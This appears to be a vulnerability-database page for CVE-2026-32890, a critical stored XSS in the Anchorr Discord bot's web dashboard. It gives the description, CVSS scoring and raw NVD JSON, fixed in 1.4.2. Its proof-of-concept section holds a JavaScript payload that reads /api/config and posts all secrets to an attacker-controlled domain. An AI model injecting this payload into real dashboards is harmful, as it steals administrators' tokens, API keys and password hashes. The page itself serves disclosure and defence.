Security Vulnerability Report
中文
CVE-2026-32890 CVSS 9.6 CRITICAL

CVE-2026-32890

Published: 2026-03-20 03:16:00
Last Modified: 2026-03-27 16:23:03
Source: [email protected]

Description

Anchorr is a Discord bot for requesting movies and TV shows and receiving notifications when items are added to a media server. In versions 1.4.1 and below, a stored Cross-site Scripting (XSS) vulnerability in the web dashboard's User Mapping dropdown allows any unprivileged Discord user in the configured guild to execute arbitrary JavaScript in the Anchorr admin's browser. By chaining this with the GET /api/config endpoint (which returns all secrets in plaintext), an attacker can exfiltrate every credential stored in Anchorr which includes DISCORD_TOKEN, JELLYFIN_API_KEY, JELLYSEERR_API_KEY, JWT_SECRET, WEBHOOK_SECRET, and bcrypt password hashes without any authentication to Anchorr itself. This issue has been fixed in version 1.4.2.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openvessl:anchorr:*:*:*:*:*:*:*:* - VULNERABLE
Anchorr <= 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Malicious payload injected into User Mapping --> <script> // Function to exfiltrate sensitive data function exfiltrateData() { fetch('/api/config') .then(response => response.json()) .then(data => { // Send all secrets to attacker's server fetch('https://attacker-controlled-domain.com/collect', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(data) }); }) .catch(error => console.error('Exfiltration failed:', error)); } // Execute immediately when admin views the dashboard exfiltrateData(); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32890", "sourceIdentifier": "[email protected]", "published": "2026-03-20T03:16:00.060", "lastModified": "2026-03-27T16:23:02.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Anchorr is a Discord bot for requesting movies and TV shows and receiving notifications when items are added to a media server. In versions 1.4.1 and below, a stored Cross-site Scripting (XSS) vulnerability in the web dashboard's User Mapping dropdown allows any unprivileged Discord user in the configured guild to execute arbitrary JavaScript in the Anchorr admin's browser. By chaining this with the GET /api/config endpoint (which returns all secrets in plaintext), an attacker can exfiltrate every credential stored in Anchorr which includes DISCORD_TOKEN, JELLYFIN_API_KEY, JELLYSEERR_API_KEY, JWT_SECRET, WEBHOOK_SECRET, and bcrypt password hashes without any authentication to Anchorr itself. This issue has been fixed in version 1.4.2."}, {"lang": "es", "value": "Anchorr es un bot de Discord para solicitar películas y programas de TV y recibir notificaciones cuando se añaden elementos a un servidor multimedia. En las versiones 1.4.1 e inferiores, una vulnerabilidad de cross-site scripting (XSS) almacenado en el menú desplegable de Mapeo de Usuarios del panel de control web permite a cualquier usuario de Discord sin privilegios en el gremio configurado ejecutar JavaScript arbitrario en el navegador del administrador de Anchorr. Al encadenar esto con el endpoint GET /API/config (que devuelve todos los secretos en texto plano), un atacante puede exfiltrar cada credencial almacenada en Anchorr, lo que incluye DISCORD_TOKEN, JELLYFIN_API_KEY, JELLYSEERR_API_KEY, JWT_SECRET, WEBHOOK_SECRET y hashes de contraseña bcrypt sin ninguna autenticación a Anchorr mismo. Este problema ha sido solucionado en la versión 1.4.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openvessl:anchorr:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.4.1", "matchCriteriaId": "584CDEBF-7E62-4732-A6FD-64B3384C3834"}]}]}], "references": [{"url": "https://github.com/openVESSL/Anchorr/commit/d5ae67e5b455241274ed0072cf2db43a6eb3f0b2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openVESSL/Anchorr/releases/tag/v1.4.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/openVESSL/Anchorr/security/advisories/GHSA-qpmq-6wjc-w28q", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/openVESSL/Anchorr/security/advisories/GHSA-qpmq-6wjc-w28q", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.